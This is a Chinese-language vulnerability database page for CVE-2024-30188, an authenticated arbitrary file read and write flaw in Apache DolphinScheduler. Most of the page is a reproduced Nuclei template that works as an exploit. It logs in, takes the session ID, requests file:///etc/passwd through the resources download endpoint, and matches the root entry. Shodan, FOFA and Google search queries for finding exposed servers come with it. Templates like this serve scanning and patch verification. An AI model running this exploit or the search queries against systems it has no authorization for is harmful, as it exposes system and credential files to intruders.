CVE-2024-30188: Apache DolphinScheduler >= 3.1.0, < 3.2.2 Resource File Read And Write

日期: 2025-08-01 | 影响软件: Apache DolphinScheduler | POC: 已公开

漏洞描述

File read and write vulnerability in Apache DolphinScheduler, authenticated users can illegally access additional resource files. This issue affects Apache DolphinScheduler from 3.1.0 before 3.2.2.

PoC代码[已公开]

id: CVE-2024-30188

info:
  name: Apache DolphinScheduler >= 3.1.0, < 3.2.2 Resource File Read And Write
  author: iamnoooob,rootxharsh,pdresearch
  severity: high
  description: |
    File read and write vulnerability in Apache DolphinScheduler, authenticated users can illegally access additional resource files. This issue affects Apache DolphinScheduler from 3.1.0 before 3.2.2.
  reference:
    - https://github.com/advisories/GHSA-4vv4-crw4-8pcw
    - https://github.com/Mr-xn/Penetration_Testing_POC
    - https://nvd.nist.gov/vuln/detail/CVE-2024-30188
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N
    cvss-score: 8.1
    cve-id: CVE-2024-30188
    epss-score: 0.80469
    epss-percentile: 0.99096
    cpe: cpe:2.3:a:apache:dolphinscheduler:*:*:*:*:*:*:*:*
  metadata:
    max-request: 2
    verified: true
    vendor: apache
    product: dolphinscheduler
    shodan-query: http.title:"dolphinscheduler"
    fofa-query: title="dolphinscheduler"
    google-query: intitle:"dolphinscheduler"
  tags: cve,cve2024,dolphinscheduler,lfi,apache,authenticated

variables:
  username: "{{username}}"
  password: "{{password}}"

flow: http(1) && http(2)

http:
  - raw:
      - |-
        POST /dolphinscheduler/login HTTP/1.1
        Host: {{Hostname}}
        Connection: keep-alive
        Content-Type: application/x-www-form-urlencoded

        userName={{username}}&userPassword={{password}}&ssoLoginUrl=

    extractors:
      - type: json
        name: sessionId
        part: body
        json:
          - ".data.sessionId"
        internal: true

  - raw:
      - |
        GET /dolphinscheduler/resources/download?fullName=file:///etc/passwd  HTTP/1.1
        Host: {{Hostname}}
        sessionId: {{sessionId}}

    matchers-condition: and
    matchers:
      - type: regex
        part: body
        regex:
          - "root:.*:0:0:"

      - type: regex
        part: content_type
        regex:
          - "application/json"

      - type: status
        status:
          - 200
# digest: 490a0046304402201af8ac3ac268ead63549b3d7f1daa4c7b5fb4324b4f237491e0228cda1c6a7b402203966bdfa408d13b7706f17728e72666748090d858d55505d34041a45b6674861:922c64590222798bb761d5b6d8e72950
来源: https://github.com/projectdiscovery/nuclei-templates/blob/main/http/cves/2024/CVE-2024-30188.yaml

相关漏洞推荐